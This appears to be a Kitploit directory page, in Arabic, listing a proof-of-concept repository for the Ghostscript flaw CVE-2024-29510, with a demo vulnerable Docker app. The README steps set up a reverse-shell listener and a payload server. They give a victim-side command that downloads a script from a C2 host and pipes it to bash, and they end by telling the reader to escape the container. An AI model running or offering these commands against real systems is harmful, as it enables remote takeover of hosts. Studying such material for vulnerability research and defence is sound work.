Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-29510 — كود POC لـ CVE-2024-29510 وتطبيق VulnApp التجريبي | Kitploit
أدوات/GitHubGitHub/swsmith2391/cve-2024-29510
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتطوير الحمولاتالهروب من الحاويةاستغلال الملفات الثنائية
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

كود POC لـ CVE-2024-29510 وتطبيق VulnApp التجريبي

عرض المستودع
11منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

البحث الأصلي وكود POC: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

ملاحظة: لم أُجرِ أي تغييرات على POC سوى الأمر الذي تم تنفيذه. يعود الفضل الكامل إلى Thomas Rinsma @ Codean Labs على أبحاثهم وPOC المذهلين.

السيناريو المحلي

  1. مغلف في سكريبت ستاجر لتنزيل وتشغيل سكريبت فحص لمعرفة ما إذا كان المضيف عرضة للثغرة
  2. تم تعديل POC لتنزيل وتنفيذ صدفة عكسية بلغة Python3
  3. تم تنزيل وتنفيذ الستاجر والصدفة العكسية عبر STDIN
  4. يترك POC أثراً في /tmp باسم عشوائي

على مضيف المهاجم:

  1. باستخدام pwncat-cs أو netcat، أنشئ مستمعاً على المنفذ 443
  2. انتقل إلى مجلد الاستغلال
  3. python3 -m http.server 80

على مضيف الضحية (Ubuntu 23.10 يقوم بتشغيل Ghostscript 10.01.2):

  1. افتح الطرفية ونفّذ: export RHOST='<C2>'; wget -q http://$RHOST/run -O - | bash &

السيناريو البعيد (VulnApp)

  1. قم ببناء VulnApp باستخدام: 'docker build -t cve-2024-29510-demo:latest .' (يتطلب نسخة من https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz في مجلد Dockerfile)
  2. شغّل VulnApp باستخدام: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. جرّب تحويل good.ps لاختبار الوظيفة. يجب أن يعيد PDF معروضاً بخطوط ترسم سهماً مثل '>'
  4. قم بإعداد خادم ويب على المنفذ 80 يستضيف shell.html مثل: 'python3 -m http.server 80'
  5. باستخدام pwncat-cs أو netcat، أنشئ مستمعاً على المنفذ 443
  6. ارفع bad.eps، سيتجمد VulnApp ويجب أن يلتقط المستمع صدفة عكسية للحاوية (تعمل بصلاحية root)
  7. اهرب من الحاوية!
تنزيل الأداة